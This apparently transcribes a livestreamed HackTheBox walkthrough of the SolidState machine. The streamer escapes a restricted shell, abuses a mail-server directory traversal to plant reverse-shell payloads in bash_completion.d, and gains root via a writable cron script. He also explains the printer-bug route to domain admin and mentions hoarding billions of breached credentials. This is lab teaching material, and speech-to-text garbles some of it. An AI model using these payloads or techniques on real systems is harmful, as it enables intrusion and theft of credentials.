So, yeah, we're in our bash, which is a restricted bash terminal, so we can see what commands we're allowed to execute by this inside this bin directory. We can execute cat, ls, and env. So the way to typically get out of our bash is to use one of... there's lots of potential ways you can get out of our bash, okay? The most... Since we do have SSH access... Is it tac p bin bash? Bad port. No, it's tac... It's tac t? It's tac t. P is port, obviously. Tac t bin bash. See if this works. Oh, we have to add no profile as well. Good call. Yeah. So it did say our access was restricted. Cannot specify... Do I just do tac-t bash? Yeah. And there we go. We see we have an entirely different prompt here. And if we check to see if we can, like, cat etsy pass WD, we can do it. So we have successfully escaped out of the restricted bash. Yeah, this isn't the intended path. I think I remember, now I think I remember you telling me about this, White Cyber Duck. But this has bypassed an entire portion of the box. A portion of the box, you're supposed to get into the box as Mindy, I think, and then realize you can't really do anything because of our bash. But whoever made the box didn't know you could do this, where you could just escape out. We do see a James user here. But yeah, now we have... I do agree we need more stream raiders. How are we looking? Oh yeah, we definitely need more stream raiders. We're gonna get our fucking cheeks clapped. What's the other way then? Well, we're gonna figure it out. We're gonna figure it out. I'm not gonna... We're gonna assume I didn't get in this way, and that we're gonna do some other way. We're gonna use some other way to compromise the machine. Don't be concerned. We're not taking any shortcuts. No shortcuts on this stream, okay? Oh, you know what it is? I get it. No, I understand the pathway now. So, you need to be able to log in to exploit bash completion D. So a user needs to log into the machine to exploit bash completion D. Because the exploit we saw before exploits bash completion D, right? So you can just override the default login shell whatever you like in the do set. Yeah, so that's what you can do essentially. And again, this essentially bypasses the need to do the privesc. So the box creator, I can see what the box creator was thinking now when they made this box. So we're gonna log out and we're gonna do the exploit and we're gonna do it manually. Okay, we're not gonna use any of these scripts. Obviously, we did see these scripts in here that will automate what we're about to do. We're gonna exploit what that Metasploit was doing with the directory traversal. So let's go ahead and do that. Telnet. Obviously, if you were doing this on the OSCP exam, there's no need to do this manually unless the script isn't working for some reason. And if you're doing it in real life also. Okay, so we're connecting to the administration portal, and we're going to want to add some users. So when you create a user, root ID, root. So when you create a user, it creates a file that contains user data somewhere on the system. Somewhere on the system, it creates a file with that username as its file name, or at least in the file name. And the username is not properly controlling for directory traversals. So we can actually escape the... Let's do help. We'll do add user. If we do something like this... since we can log in as Mindy, let's just get logged back in as Mindy again. And I can demonstrate how this is going to work on the box itself. Okay. vsudo. That's probably not going to work. You're not going to be able... So I'm going to explain why that's not going to work here in a second. Why I suspect it wouldn't work. Particula.du. I will explain how that probably will not work. Let's try to create a user. And let's create it temp Cthulhu fhtagn. Okay. And we include a password. So the password will be password. Okay, so we've created a user with this very odd username. If we head back over to the box, if we go into the temp directory, there is no Cthulhu fhtagn. Did it not work? Did I do it wrong? I thought that would work. Log in again. I don't think you're going to have to log in again to make that work. You have to log in for a different reason, which I'll get to here in a sec. Maybe it didn't finish making it yet. List users. Okay, we do see that our temp Cthulhu fhtagn user is there. I thought it would made a file. Maybe I'm understanding how this works incorrectly. Or it could be PSAUX grep James. Tac I James. Is this running as root? It is running as root. It's a Java program. It is running as root. Send mail to the user. Yeah, maybe it doesn't create. Maybe it doesn't create the user until you send email to, or maybe it doesn't create like the folder for the user until you send mail to it. So let's send mail. Do we have to log in as the to the other thing, or can we send mail in here? I guess we can't send email via POP3 either. We're gonna have to send it via SMTP like we did before. How did we do this yesterday? Or not yesterday, but Sunday. What did we use? What was that tool we used on Sunday? Who remembers what that tool was we used on Sunday? Swax, that's it. That's the one. Okay, Swax. This allows us to send emails from the command. I did it twice. Tac help. We'll do this again. This lets us send emails from the command line. So this should be easy enough to Swax examples. How to use Swax. This looks good. We don't need to send any attachments or anything. Neat little tool. Yeah, it's pretty nifty. Swax. We could just do it manually via SMTP, but I don't see a reason to do that if this will work. Let's try to send one to... Oh, God, it actually might not work. It may not accept this as an email address. This crazy... We may have to do this manually just because of how crazy the email address is. We saw it was mail admin at localhost before. We'll do server is going to be 10.10.10.51 from Al at twitch.tv. And what do we include as far as the body? We'll just include this crap. That works for me. The quotes are messed up. Okay, we don't need 3 headers. Let's just simplify this. Okay. Like that. Oh my god. What'd I mess up this time? Does it not like the spaces? Okay. Again, it may not accept this because of this crazy fucking email address. So we might have to do it manually. Oh! It looks like it did work. Message received. Okay. It looks like it worked. So let's check in here now. And we still don't get anything. This is so anticlimactic. Find root tech name. Oh. Why am I not seeing it then? I'm in the temp directory. Oh, there it is. Okay. So here we now have a directory called Cthulhu fhtagn that contains the emails. Contains the emails of this user. And you can see like some it's a bunch of Java serialized data. So you're probably not gonna be able to read them directly. Oh, here we go. Yeah. So we just have some clear text of what the message contains. Does this make sense? Does this make sense how this exploit is working? Why was it not there? I have no idea. Maybe it just wasn't written yet. It could have been it just hadn't written the file yet. I don't know why it didn't work. Does that make sense? So we send them an email, and then if the user does not have a folder yet, it creates a folder, but it does not control. It does not control for this directory traversal line in the username. So it allows you to effectively write files to just about anywhere you want to write. And so you can create a directory by creating a user, and then you send an email to create a file. Does that make sense how that works, everybody? Does that make sense? If it doesn't make sense, this is Newbie Tuesday, so I will I'll be charitable. I'll be charitable to you. Any questions? Lacerated Digits, thank you for the follow. Joey-O, thank you for the follow. Where does bash completion D come in? I'm glad you asked, because that leads me nicely into my next point. So bash completion D is a folder that basically runs when the user logs in. It's basically, you can put scripts in there to customize the completion, like the tab autocomplete that your bash does. So we can effectively just write a bash script into that folder, and it will execute when the user logs in. Does that make sense? It will execute when a user logs into it. Does that make sense, chat? It'll execute for that user. So what we've done is only part of the exploit. Yeah. So now we need to write some bash here to execute. We also need to create a different user because temp Cthulhu fhtagn will not work. Let's do Stream Raiders really quickly before we continue. So it's like that user basically has root access. We won't have root access because bash completion D will not execute with root permissions. If we log in as Mindy, it'll execute with Mindy's permissions. So effectively, this is completely unnecessary because we've already escaped our bash. But it's still useful for showing a very OSCP-like exploit. Pally Dog, thank you for the prime indoctrination into the cult. Welcome to the All Has Red Team, my friend. Thanks for supporting the stream. Alright, get him. No fear. Oh my, we're getting flanked. We're getting flanked. Oof. I don't know if we got this one, guys. Doesn't look good. Nope. Did not. It was so close. When you get a chance, would you be able to explain unconstrained delegation as it pertains to attacking AD? What is happening here? We still have one... Oh, it's a flying rogue. Interesting. So... Whose guy is this? Zututu Kulipa has a level 1 flying rogue that is just whittling down these enemies. You're gonna get there, little buddy. You've got this. And I guess they don't shoot up. Yeah, I guess these attackers don't hit up. I'm doing my part. Exactly. We're getting it done, okay? I'm excited to see how we write a bash script by sending SMTP. Well, that's why writing vsudo won't work. Or etc sudoers will not work, because you could write the file, but the file will be poorly formatted. It's going to have all that other SMTP stuff in it. So the file will be poorly formatted and it would not execute. It would cause an error. It's not much. It is. It's not much, but it's honest work. Zututu Kalipa is the MVP of this battle for sure, with their level 1 flying rogue. 10 hours later, listen, it's gonna make it, okay? We have 1 hour, we have 1 minute and 24 seconds left. You can do it. Get there, Zututu Kalipa. He's gonna get there. He's gonna get there. I believe in him. I believe in him. This reminds me of group projects. It's true. It's true. Pluto Keck Z, thank you for the follow. Cthulhu Fountain to you, my friend. Good job, there's no time limit. There is a time limit. We have 48 seconds left. You just can't really see it because it's in yellow at the top right. My goodness. What a Chad. What a fucking Chad, dude. I think Zututu Kulipa has earned the rewards from this one. I can't give him both rewards, but he deserves at least the Saint Scrolls, okay? Nice. I guess we should all pick flying stuff. All right. Okay, so, again, you can't write to... Sudoers will not work in this situation. Because... First of all, because if we weren't able to find that unintended bypass for our bash... So, first of all, if we hadn't been able to find that unintended bypass, we would not have been able to execute sudo in the first place. Second of all, if you tried to run vsudo, or vsudoers, or etc sudoers, the file would contain all this SMTP stuff, and it would be ugly. And it would not execute because the formatting is incorrect. So that's not going to work. Instead, we need a different option, and bash completion D will work. Okay, so root. Fuck. How did I log in again? Oh, it's just not responding. Root. There we go. Help. So we're going to add user. .. slash. How many .. slashes was correct last time? Etsy bash completion D, I think. We can double check the search exploit. I feel like I've done the same command in search exploit 50 times today. Let's look at the script. Attack X for examine. I just want to make sure we're spelling everything correctly. Etsy bash completion D. Let's just copy this straight out. The host name is going to be localhost. At localhost. Or it doesn't need to be at localhost. It just needs to be Etsy bash completion D. Yeah. So we'll add the... Oh, I forgot to put a password. Password will be Cthulhu fhtagn. Okay. So we've added... We now have a new user, and if we go to list users, we can see we also have Etsy bash completion D here. So... now that we have that, we're going to send a message. So the message we're going to send is going to contain some bash to execute. So I am a little bit concerned about bad characters here. I think it'll be fine. Let's just try it without. And if it doesn't work, I know how to fix it. So what is my IP address, first of all? Config ton 0, 10.10.14.30. So open up our hack tools thing here. 8443. Copy the reverse shell. We are going to have some... These quotes are going to be a problem. They shouldn't be a problem. We'll be fine. We'll just make double quotes. We'll make single quotes here. Paste that in. And we'll do double quotes around the exec bash. So a simple reverse shell right here is all we're doing. So we will have to exit out of here. We'll split this in two. Okay. All right. Bash tac C, exec bash tac I. Okay. Oh, we're sending it to the wrong user. We don't want to send it to that user. Let's make sure we get the correct address here. We do want at localhost. Okay. Okay, so we are sending a message. Should you fix the syntax error for the header too? What syntax error? No, it should execute just fine. I think. With that. Let's connect to Mindy's profile again. And we notice we do not get a connection. It took a second to execute the... I wonder if it... Oh, tac header. That's my bad. Subject is test. It did a subject anyways. It doesn't really matter. It could be that we just have to do this manually, and using swax just isn't going to work. Oh, maybe it's the no profile that's killing it. Okay, so we get a bunch of this crap. This is all the these are all the syntax errors from all that extra SMTP stuff. So we know we wrote to the correct location. Unfortunately, we did not get a shell. The intender header ended up in the body. Maybe that's causing an issue. It could be a wide variety of things. It's always tricky with these sorts of things. Maybe it has to be in the header? Let's try sending another email. We're writing to the correct place. Let's do tac header. And let's put it in the header this time. If it doesn't work, it might be because of bad characters. There might be some characters getting changed or mangled. This exploit works well. Yeah, I know. There will be scripts that work just fine. I'm choosing not to use a script because I'd like to see if I can get it to work manually, because I think that's more informative for you degenerates. On my own, I absolutely would use the script, but we're learning together today, okay? That's what Newbie Tuesday is about. Interestingly, I'm not seeing my command. I'm not seeing my bash command anywhere here. What exactly on that line 3 that it arrows out on? I'm not seeing my command, which indicates to me it should be executing, but I'm not getting a shell. 10, 14, 30. Let's double check and make sure my shell works. It's always good to just check this really quickly. Yeah, it does work. Okay. Let's do instead. Let's highlight this. And let's base 64 encode it. There could be some bad characters that are happening. All right, so we can try another command, but we might want to delete the emails. Because we're getting a lot of mess in there. Let's do telnet 110. Who's user? This. Okay. Pass Cthulhu fhtagn. Okay, list. Okay, can we delete those messages? What's a pop3 command for deleting a message? Deli 1. Deli 2. Okay. List. Okay. So that solves that problem. Let's do... We're going to try... taking this. Echo that. And pipe it into base 64-D. And pipe that into bash. This is a common way to get around bad characters in your payloads. Because the only weird character in this payload is the pipe, which isn't usually bad. Okay. Oh, there is a plus sign here. I hope that doesn't matter. Okay. And we log in as Mindy again. Still nothing, huh? Again, it's not showing my bash here. Is there something about this I'm not getting? I don't see my bash anywhere in here. It should be like a... If there was a syntax error, it'd be warning me about that. Well, I guess we probably need to do it manually, huh? We can probably just try and send it manually. I guess Swax is not going to work here. List. It still is not showing our... Maybe we have to log in again. User. That. Pass Cthulhu fhtagn. List. I was like, there's 3 messages in there now. I deleted them, though. Huh. Well, we're probably barking up the wrong tree by doing this with Swax. It probably needs to be done manually. Yeah, all the emails are still in there too. Like, we're deleting them, but they're still there. They're apparently not removed from disk. I hope that's not going to cause a problem. Can we add a semicolon and then a bad command, which should show up in Mindy's session to show it's reached the exploit code? I mean, it's just not executing. We already know it's not executing. What I don't know is why. Just because I don't understand this exploit completely. Hack tricks SMTP. Can we do it? Does it have like one for sending an email manually? Okay, we can do username verification. Sending an email from Linux console. This is using send email. Sending an email with Python. I just joined. What's going on? We're exploiting SolidState on HacktheBox. Huh. I hope all those other emails aren't going to break anything. From Telnet SMTP. That's what we're looking for. This is supposed to be an easy box? I mean, this is a reasonable box. This is the kind of box you'd expect to see on like OSCP or something like that. It's reasonable. What I don't understand is why it's not deleting the emails. I don't know why it's not deleting the emails. I hope it's not a problem. All right, let's Telnet support 25. I don't know if I want to use Microsoft's documentation. It could be like it's this subject line and stuff. Okay, this looks pretty useful. Okay, alo alhazred.com, I guess. Hello. Pipelining. Okay, great. Mail from. Al at alhazred.com. Syntax error. Does it want caps? Syntax error. What's my syntax error? I just copied and pasted. Let's take a little look at the exploit. See what the exploit's doing in that regard. James. I guess we'll look at this one. Attack X for examine. And let's see how it's sending the email. Okay. Connecting to James. Oh, there's a quote. Oh, that's why our payload isn't executing. It's putting all this other crap in quotes so that it doesn't error out, and then it's writing the payload. Okay, so it's putting all the metadata, all of the SMTP stuff as just a string, and then it should execute the payload. Okay, it makes sense now. Let's just send exactly this. That makes more sense. I'm glad we looked at the exploit. Okay, that worked. Now what else does it want? Let's do this. Okay. And then data. I don't know why I'm copying that. It's fucking one word. Data. Send data. Okay. Okay. We'll do we'll do new lines. Okay. Hopefully that's okay. And then the payload plus a new line after it. Okay. So we'll use this payload. StarCraft 2 is going a little bit hard for me right now. Paste this in here. My goodness, Gyros Geyer with the raid. Welcome, my friend. Hopefully I pronounced your name correctly. How was your stream? Thank you so much. Thank you so much, and welcome to your viewers. And then we send a period. It wants us to terminate it with a period. Did I do this right? Okay, there we go. It didn't want /r/n. It wanted just a carriage return and a line feed. Hopefully that doesn't break anything. Okay. I think we can just quit.
The hunter must hunt.
Okay. Okay, we're gonna log in. Let's see if we get our execution now. God damn it. It's probably all these bad emails in here. I forgot the fucking I forgot the quote. You're right, I did forget a quote, didn't I? Where was the quote supposed to go? Fuck. Right here. Damn it. You're right. I did forget the quote. Son of a bitch. Okay. Mail from alhazra.com. Oh. This. Okay. Receipt to that. Okay. Data. And then this. Okay, exit. Quit. Okay. Let's see if that worked. God damn it. I wonder if it's just because of all this crap. Like, because we sent those other emails, is this one just broken now? A silly question, even if I admire. Why do this? You've already had the shell with Mindy's account. There is no reason. I'm only showing this because it's Newbie Tuesday. Does the exploit bring you more powers? No, it'll execute code as Mindy. I'm wondering if it's all this fucking crap that's breaking it. God damn it. Well, let's just try to escalate privileges. Let's try to escalate permissions first. We'll get root, and then we'll go back. We'll delete those shitty files. We'll delete those files, and we can see if we can get it to execute later on. DevMe loading, Farouk ZZZ, and Rich Fantasy. Thank you for the follows. Cthulhu Fountain to you, my friend. Chad brought Gyros Geyer into the cult. Welcome to the All Has Red Team, Gyros Geyer. Thank you so much again for the raid. It's a different error. It looks the same to me. And I suspect it's because... is there sudo permissions? No. Oh, we're not logged in. We have our bash. I'm suspecting it's because of all this fucking shitty emails that we sent before. Sudo tac l. Command not found. Su root. Root. Nope. There's a lot of files in here owned by root in Mindy's home folder. James. Okay, he does have an SSH directory. Let's check. No. I typed exit for no reason. CD documents. Okay, nothing there. Let's check the root directory. Is there anything there? I'm just looking for quick ways to escalate. Mindy. Find. Attack user. Mindy. Let's find all files by Mindy's user. Doesn't look like there's anything. We can... I could have done grep. I could have done an inverse. Like, what's the... Is it grep tac v for inverse? Proc. Yeah. So, we can remove all the proc things. There's nothing there. Let's find James. There's another user named James. Let's see if there's any files owned by James. His entire home folder. This all looks normal. We do see a .nano file there. Damn it. Nothing there. Config. Damn. Nothing there. Yeah, maybe so. Again, it might have been really particular. Just to remove, I don't want to keep beating my head against that when I'm concerned it might be erroring out. Because of those files. I'm just going to proceed with getting root, and we'll circle back around to it. We're going to circle back around. We're going to get that exploit to work, I promise. It's just probably very particular. And yeah, you could easily use the script to do it. Did we check opt? Okay, that's a thing. Temp.py 777 permissions. Owned by root. So my guess is this is like a cron? Is there a cron job? We'll go into dev shared memory folder. CD opt. I'll show off pspy. Pspy picks up on stands for process spying. You don't need to be root to run it, and it will it'll pick up a new process when it gets started, and tell you the command line arguments that have been passed. 10, 10, 14, 30. It's the best way to detect cron jobs. 10, 10, 14, 30. wget http:// 10, 10, 14, 30. pspy 64 small. 64s. Okay. pspy. Oh, we have to chmod it. Chmod plus x. pspy 64s. And then we execute it. pspy 64s. Well, that's not good. Oh, it's 32-bit. Interesting. That would be why it didn't work. pspy 32 small. Oh. Don't see too many 32-bit systems anymore. Every so often you do. There it goes. Why not type out etc cron tab? Because you can't see stuff that's in the root cron tab. Okay, so these are processes as they're being started, and here's what we're looking for right here. bin/htac python opt temp.py. It's just clearing the script is just clearing the temp directory, but we can see that it's UID 0. Who is UID 0, chat? Who is UID 0? It's root. Yeah. Root is UID 0. nanotemp.py. And we can have this just execute anything. Got 5. Okay. What the fuck is this? 5 spaces. He's not using tab. That's tab. Instead, 5 spaces of an indent. What is happening over here at SolidState Security? Who are these degenerates who are hitting space 5 times in order to, like, what? Yeah, what exactly? Chat is appreciative of the utter degeneracy that we are viewing here. So we could just execute whatever we want here. We'll just have it do this to verify that this works. Okay, cat temp.py, make sure it executed. Yep. So we should get a shell as root soon-ish. This did not take long to pick up, so maybe it's executing every minute, if we're lucky. What else are you going to do in Baltimore? What do you mean? I mean, there is this fictional company is from Baltimore. I love significant white space. Oh, yeah, absolutely. I know that whenever I'm coding, I just go like... And I'm just like, oh, time to indent my code. And I'm just like this. And I just start typing from there. Like, that's... 5 space. Yeah, that's true. Good point. Okay, here we go. We got root. There's our root shell. And there's root.txt. So we can go into etc bash completion D. Okay, so we wiped out all of those files. Okay? All those files are now wiped out. And now we can try this exploit again. Okay, let's wiped out the legit files too. I did, but it doesn't really matter. It doesn't really matter. Hopefully. He says, praying to God. Now that he's thinking about it. I want the search exploit James. And I want the... This one is the one I was copying off of. Search exploit attack X for examine. Okay. Come down here. And this is what we're sending. We're gonna split this pane in half. The font is big enough that I'm just gonna make it a little bit bigger. Let's split this pane in half. Let's just kill this. And we'll go back over here. This way I can copy off of it exactly. Telnet 10, 10, 10, 51, 425. Polybond, thank you for the follow. Why is it not connecting? M.A. Kingston, thank you for the follow. Did I use the wrong IP address or something? It looks like I did. What's the IP address of this machine? 10.10.10.51. Is it shut down? No, we want to connect to port 25. The box seems to be having issues. Is my VPN having issues? It looks like my VPN is having issues. Let's just try reconnecting. There we go. Looks like my VPN was just having issues there. Alright, we're just going to copy and paste literally all of this stuff. I'm going to stop trying to be cute. Okay. Mail from this. Okay. Receipt to that. Okay. And then we send data. Okay. From let's put in another thing, and then it's like that. And then the payload. Damn it. Fuck. I guess we're just gonna need to kill the root shell. We're not... What? What do you want, honey? She's out there babbling. She's outside the door just yelling. Echo. We need a different port. B64. Okay. Echo. Paste. Base 64 -D. Pipe that into bash. Quit. Okay, let's see if that did it. Okay, and where'd I put her password? God damn it! What is going on? Still errors out. You still get nothing. Have a good night, Owen Codes. Do you run Kali on VirtualBox? I do run Kali on VirtualBox. Can you show the setup? I mean, it's just a default Kali installation. I need to reinstall it, honestly. Like, it's still not... It's just not running. God damn it. I mean, I guess it could be bin bash. Like, I'm not sure what to say at this point. Well, let's get the... We'll catch the root shell again. The root shell is still executing, so we'll just wait for it to execute again. Oh, yeah, Stream Raiders. Good call. Thank you. All right, this time I brought my flying guy. Copycat? Hey, if it works, it works. Plus, it just seems like a ton of these same enemies. We just had enough dudes that time. Did your mail from have a quote in it? Yeah, it did have a quote. I will copy all your hacking skills. Seems like a good trade. It is a good trade. This is pissing me off. What the fuck just happened? So we got the quote in there. There's a quote here. And here's our... Have a good night, T-Manster. Enjoy your book. Why the fuck is this not executing? What is that last? This one right here? It was in the exploit. I assumed it was necessary. I need to re-encode the string? No, I don't. Oh, I did. No such file or directory. I wonder...
A hunter must hunt.
Let's do it again. Takes fucking forever to get this thing. Again, you could just use the script. Obviously, it'll work if we use the script. We're trying to learn more by doing this manually. But I admit I'm kind of losing my motivation to do that. Because this is just not working. It's very finicky, it seems like. Zero Kieran, thank you so much for bringing BitShifter into the cult. Welcome, BitShifter, and thank you again, Zero Kieran. Okay, and then data. Send data. What if we just terminate it there? And then we send... I mean, this shit isn't working. So let's try a different reverse shell. Let's just try a netcat reverse shell. Okay. That. And we quit. Okay. Let's try it one more time. And we don't get any error messages that time. Did the message send? I used 8443, did I? Which means it's working, man. Oh, but I have to use 8... Okay, we have to be quick. Quick, chat. Aha! Aha! Ha! Oh, don't tell me it died. We got a connection, though. It died. We did get a connection. I don't know why the shell died. Oh my god. Are you for real? It's hanging. Like, what the hell? Let's try it one more time. We did get it to work that time. I don't know why it refuses to, like, the shell is dying now. It looks like we've worked out the kinks of this exploit. Maybe because of the RM. No, that's normal. It shouldn't terminate the shell. But it will throw an error like that. Let's do 8445 this time, I guess. Come on, give me the root shell. Oh, there's a ZSH one here. So any file, yeah, because any file in bash completion D is parsed and executed when the user logs in. Yes. I don't know why the shell is dying on me. We'll do 8445. I'm not tired of doing this. You're tired of doing this. Paste. Receipt. Data. And then what did we do last time that was different? We did, we put a quote to terminate the string. Oh, I did it wrong. Fuck. Fucking broke it. This is frustrating, but that's the way hacking often is. And again, there's no reason to do it this way other than to learn. And then data. And then we take from. And then we terminate the. We do this, and then we put the bash one-liner. Fuck. Okay. I don't think the quotes should matter, but we're going to do it anyways. Double quotes. Just pull up Notepad. Telnet makes this a lot harder than it needs to be. And we terminate it with a period, and then we quit. Okay. Okay, we're listening. SSH Mindy. Paste in the password. Like, I put 8445 this time. Didn't I? No, I put 8443 again. Oh, no, this was the old one. Why didn't it fucking execute? Why didn't it fucking execute, dude? Or was that 8443?
What are you doing, step bro?
I honestly don't even know at this point. I've done this so many fucking times. I honestly don't even know what Step Bro is doing at this point. God damn it. What is happening? I don't know why it's not... There we go. It worked that time, but why am I back? Ambiguous redirect. We got in a connection, but it failed again. This is crazy, dude. This is fucking nuts. This is fucking nuts. This is like the millionth time I've done this exploit. But at this point, I'm determined to get it working. Like, at this, like, the shells are just dying for no reason. Okay. We're going to just do a basic netcat line because netcat at least didn't die. Well, the shell died, but at least netcat didn't disconnect. 10, 10, 14, 30. 8445. And then tac E. Bin bash. Make sure we use full paths. Quit. Okay. Okay, for the millionth time. I think HacktheBox VPN is having issues because I was having issues trying to root a box. I guess that could be it. Our VPN did die on us. Alright, let's give it a second because it didn't work immediately last time either. I mean, we're getting a connection, then it immediately dies. Okay. I mean, I don't know what else to do at this point. I don't know why it's dying. It is a good point, Mr. Robot, that, wasn't there a cron? Yeah, it doesn't matter, though. We're not writing to temp. We're writing to Etsy bash completion D. I don't know why our shell is dying. At this point, I'm wondering if the HacktheBox VPN is having issues. You can try the script. I mean, it's not gonna... It's just gonna die on me again. We can try it. So it is executing, but the shell immediately dies for some reason. I think the HacktheBox VPN is just having issues here. Like, I don't know what to tell you. Like, I don't know why this is happening. Like, we're clearly getting a connection, and then it immediately dies. And we did have VPN issues before. So, maybe the lab is just having issues right now. I don't know what to say. Other than I'm just fucking sick and tired of doing this whole fucking exploit over and over and over again. Only to have the shell die for no reason. I've tried 3 different reverse shells. They all just die immediately. I don't know, dude. I'm Top Feet, thank you for the follow. Vikwer, thank you for the follow. Emma Trusky, thank you for the follow as well. Cthulhu Fountain to all of you. Well, I think that's where we're gonna call it today, guys. I mean, I'll stick around. We're gonna talk a little. We'll talk a little bit before I go. I don't want to keep trying this exploit over and over again. If the damn thing is just gonna die on me over and over again. Log4j. I'm not gonna try Log4j. I don't think there's anything to be learned from that. I'm gonna stream in a bit, I think. Okay. Well, type Tibbs. If you go live, I'll raid you. If you go live in the next 10 minutes or so, I'll raid you. Does Newbie Tuesday? What? Did you not get a box today, little Dee? Little Dee, did I not root a box today? What? I don't know why the shells are dying. I've tried 3 different reverse shells and they've all just died on me immediately. I don't know why it's happening, but I know that HacktheBox's VPN is having issues. I don't know what to tell you. Like, if you wanna hop on there and do exactly what I just did over and over and over and over and over again, until it works, then you could be my guest. But I'm worn out with this exploit. Bitshifter, thank you so much. Welcome. It's good to have you. Someone did ask about I think they asked about unconstrained delegation. So unconstrained delegation is where in a Active Directory environment, services are allowed to execute commands, are allowed to do things with the permissions of another user. Okay, this is you have various solutions for this across all systems. Like in Linux, it's going to be sudo or su for switch user, or pkexec for instance. But in Windows Active Directory, in a Windows Active Directory environment, you're talking about constrained and unconstrained delegation. The names are similar, but they're actually very different. So, unconstrained delegation is usually applied to machine accounts, to a whole computer account, and a computer account with unconstrained delegation always has all ticket granting tickets, all Kerberos tickets that it receives cached in memory. And yeah, I do have a Discord. Thank you, BitShifter. All ticket granting tickets on an unconstrained delegation machine are always stored in memory of every user that logs in. This is so that on any other user on that machine or any other service on that machine can use those tickets to authenticate as those users. So if you manage to get root on a machine with unconstrained delegation, you have access to all the Kerberos tickets in memory of all users who have logged into that machine, which is very powerful. And to make matters worse, you can use something called the printer bug. There's no better name for it. To force the domain controller to authenticate to you. And if you can do that, to authenticate to the machine with unconstrained delegation configured. And if you can do that, if you can do that, the domain controller machine account's ticket will be stored in memory, and then you can dump it out of memory and use it to authenticate to the domain controller and DC sync it. So you can essentially get domain admin that way. So unconstrained delegation is pretty bad. Constrained delegation is much different. Constrained delegation is usually configured on user accounts, and user accounts are specifically allowed to authenticate to a specific other service with a service principal name configured on a different machine or on the same machine. Basically, that user is allowed to authenticate to a different service.
Would you have time to do the printer bug for a video or something, or on stream? I always mess that one up.
Would you have time to do the? Yeah, for sure. I would have to set up an Active Directory lab to demonstrate that. The printer bug is actually very easy to use. There's just a GitHub page. GitHub printer bug. This is the one right here, spool sample. This is what you're looking for here. So you would have to compile this. This is a Visual Studio project. You would compile this and get spoolsample.exe. And you can see... I don't remember its permit. I don't remember... It's basically... It only takes, I think, 2 arguments. It takes the argument of... what machine you want to authenticate to, and which machine you want to authenticate to that user, to that machine. So essentially, the reason it's called the printer bug is it's exploiting how Active Directory manages printers, and it effectively just allows you to force any machine on the domain to authenticate to any other machine, in order to evaluate printer settings. So you can force the domain controller to authenticate to you using this tool. You would typically run this through... You would either upload it to the target, or you would use exploit assembly in Cobalt Strike. It's pretty simple, pretty easy to do. But you would want Rubius listening on the target to catch the new... You don't have to have Rubius listening, but you would want to run Rubius on the target, on the machine that's being authenticated to get the domain controller's ticket. And you can dump it out of memory, and then you can use the domain controller's ticket to authenticate to the domain controller directly. Or do you know any good boxes, pro labs to practice constrained and unconstrained delegation? The best place is going to probably be CRTO. The Certified Red Team Operator course is very affordable. It covers both constrained and unconstrained delegation in detail. And this is the best part, you can use Al's affiliate code so that I get a little bit of the money for you applying for CRTO. So I recommend, that's the best way. I've seen constrained delegation on a few machines on Try Hack Me or HacktheBox. We actually see unconstrained delegation quite often. Does anybody know why? A lot of the machines we've done on this stream have been configured for unconstrained delegation. Does anybody know why? Slayer Darth and What Is Life's. Thank you for the follow. Oreo Bite, thanks for the 100 Seagull biddies again. Nice you saying now about the affiliate code. That's fine, not a big deal. But I do have an affiliate code. I need to put it in all of my socials so that people can find it easily. Yeah, I'm sure Heath Adams has the Cybermentor has some good courses for that as well. I don't know if he covers delegation. Embargo. Yeah, that's exactly correct. Domain controllers are always configured for unconstrained delegation. It doesn't really help you. If you manage to get root on a domain controller, you're domain admin anyway. But if you look for unconstrained delegation machines on a network, you're on an Active Directory network, you're always going to see domain controllers. Any other questions, guys? I'm just hanging out answering questions. Diversify your bonds with the 15 months of Prime. Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. I have not taken Heath Adams' courses, but people swear by him, so I'm sure they're quite good. I think he mostly shows you... Yeah, I would imagine he's probably trying to guide you toward his certification now. I've seen you use Netcat, so I know some of his functions. So what is Netcat? So Netcat... first of all, I don't really use Netcat on stream. This is not Netcat. This is it's alias to NC, but it's actually NCAT. Which is sort of has the same functions. But NCAT is part of the Netcat library. It's part of the Nmap project. NCAT is sort of a more feature-rich version of Netcat. Netcat is kind of a Swiss Army knife of network connections. You can set up a simple TCP listener. You can make a simple TCP connection to send raw data through. Things like that. Netcat is very, very useful, especially if you're going to take OSCP. You'll use Netcat a lot. It's one of your most core important tools. I guess we stall a bit until Tiberius starts streaming. I'll let him get started for a little bit. I'm not in a hurry or anything. Do you use any password breach service or you download the databases locally? Well, I used to monitor raid forums. Raid forums was kind of like a semi-secret but not really secret hacker forum for all manner of different hacker stuff was on there. Malicious actors, white hats, gray hats, black hats, all kinds of people were on there. So a lot of data breaches would find their ways onto raid forums. Yeah, I would add them to my personal database. I have a whole hard drive full of breach credentials. Like billions of breach credentials, most of which came from the breach compilation, but I would occasionally find new ones in raid forums and add them to my collection.
A fine addition to my collection.
Raid forums is now gone. If it's still, I don't know if it's still up, but you shouldn't go there if you do, because the FBI is basically shut it down. The FBI shut down raid forums and was using it to phish credentials for a while. They seized control of it and was using it it was a fake login page. The FBI seized control of the domain and was using it for Isn't that illegal? It's not illegal to go on the internet and post credentials. Raid forums did a lot of stuff that was questionably legal. A lot of drugs trade happened there and stuff like that. Doesn't surprise me that the FBI shut it down, but that's what I was using to find breach compilations before. It's always good to keep your fingers on the pulse over there. I didn't really contribute, but let's do Stream Raiders really quick. Will you do napping on Thursday? Right, that was the Try Hack Me machine? Yeah, we'll do napping on Thursday. That was recommended to me on Sunday, and we ended up doing a different one. But yeah, we'll do napping on Cthulhu Thursday. CRTP or CRTO? Well, I haven't taken CRTP. I will say CRTO is cheaper. And CRTO is one of the best courses for the money that you pay. It's some of the best bang for your buck and you're going to get in the entire industry, I'm going to be honest with you. You get a lot of value for your money. And you get to... The best thing about CRTO is you get access to Cobalt Strike. You get access to Cobalt Strike in a controlled lab environment, so you can play around with Cobalt Strike instead of like Covenant or Metasploit or anything like that. Yeah, I don't think CRTP has like an agreement with Raphael Mudge for like a Cobalt Strike license. Technique and Night City Netrunner with the most kills and most assists. Ticker, Ralphie's, and Sorovi with the bonus rewards. Covenant or PowerShell Empire, yuck, yeah, gross. In 90% of real world red teaming engagements, you're going to be using Cobalt Strike. Cobalt Strike, the reason you can tell Cobalt Strike's good because the actual bad guys use it. So, the actual APTs are using Cobalt Strike. I don't know why OffSec doesn't do that too. OffSec is not trying to teach you Cobalt Strike. OffSec is trying to teach you the basics. Should I do CRTO after OSCP? If you're interested in going the red teaming road, then yeah, CRTO is great for getting you started on that path. Chad B. Noob, thank you for 